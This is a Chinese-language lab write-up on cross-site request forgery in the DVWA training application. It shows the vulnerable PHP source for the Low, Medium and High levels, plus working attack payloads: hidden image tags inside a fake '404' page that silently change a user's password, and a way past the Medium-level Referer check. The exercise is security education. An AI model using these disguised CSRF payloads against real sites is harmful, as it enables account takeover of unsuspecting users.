DVWA之CSRF学习
DVWA之CSRF学习
CSRF攻击过程及分析
Low级别
首先,抓包看一下改密码的传输都有哪些
得知URL为:
http://用户的ip/DVWA-1.9/vulnerabilities/csrf/?password_new=输的新密码&password_conf=输的确认密码&Change=Change#
当用户A在访问该网站时,只要用户A点击黑客B精心构造的这个URL时就能造成CSRF攻击
构造链接:http://192.168.244.131/DVWA-1.9/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#
LOW级别源码如下:
<?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; // Do the passwords match? if( $pass_new == $pass_conf ) { // They do! $pass_new = mysql_real_escape_string( $pass_new ); $pass_new = md5( $pass_new ); // Update the database $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); // Feedback for the user echo "<pre>Password Changed.</pre>"; } else { // Issue with passwords matching echo "<pre>Passwords did not match.</pre>"; } mysql_close(); } ?>
发现以上源码并没有加入任何的过滤和验证,所以可以说是没有防护
当然,这个URL过于明显,稍微有一点知识的人都能看出来这是一个改密码的链接,所以说我们就应该想一下隐藏的放法,比如构造一个HTML文档
文档如下:
Test.html
<imgsrc=" http://192.168.244.131/DVWA-1.9/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#"border="0"style="display:none;"/>
<h1>404<h1>
<h2>file notfound.<h2>
其中style="display:none;"是不让这个元素显示出来
当用户打开这个HTML时,以为这是个错误的页面,一般不会在意,但是这样就能把用户的密码改掉了,
发现密码错误
再试一下改过的密码
登陆成功
Medium CSRF
同样,我们先抓包看一下改密码的请求有什么不同
看一下它的源码:
<?php if( isset( $_GET[ 'Change' ] ) ) { // Checks to see where the request came from if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; // Do the passwords match? if( $pass_new == $pass_conf ) { // They do! $pass_new = mysql_real_escape_string( $pass_new ); $pass_new = md5( $pass_new ); // Update the database $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); // Feedback for the user echo "<pre>Password Changed.</pre>"; } else { // Issue with passwords matching echo "<pre>Passwords did not match.</pre>"; } } else { // Didn't come from a trusted source echo "<pre>That request didn't look correct.</pre>"; } mysql_close();} ?>
发现源码里多了一个这样的对比: if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )
是匹配主机名字的,如果主机名与发起请求的名字一样的时候,就可以完成改密码的攻击
那么我们可以构造这样的一个HTML 用户A的主机IP地址为192.168.244.131
192.168.244.131.html 这个网页需要放在攻击者的服务器中
内容如下:
<imgsrc="http://192.168.244.131/DVWA-1.9/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#"border="0" style="display:none;"/>
<h1>404<h1>
<h2>file not found.<h2>
其中style="display:none;"是不让这个元素显示出来
我们把这个文件放在攻击主机上网站根目录下
然后在攻击主机上去访问这个文件
当用户在用密码password登录时发现已经登不上去了
High CSRF
<?php if( isset( $_GET[ 'Change' ] ) ) { // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; // Do the passwords match? if( $pass_new == $pass_conf ) { // They do! $pass_new = mysql_real_escape_string( $pass_new ); $pass_new = md5( $pass_new ); // Update the database $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); // Feedback for the user echo "<pre>Password Changed.</pre>"; } else { // Issue with passwords matching echo "<pre>Passwords did not match.</pre>"; } mysql_close();} // Generate Anti-CSRF tokengenerateSessionToken(); ?>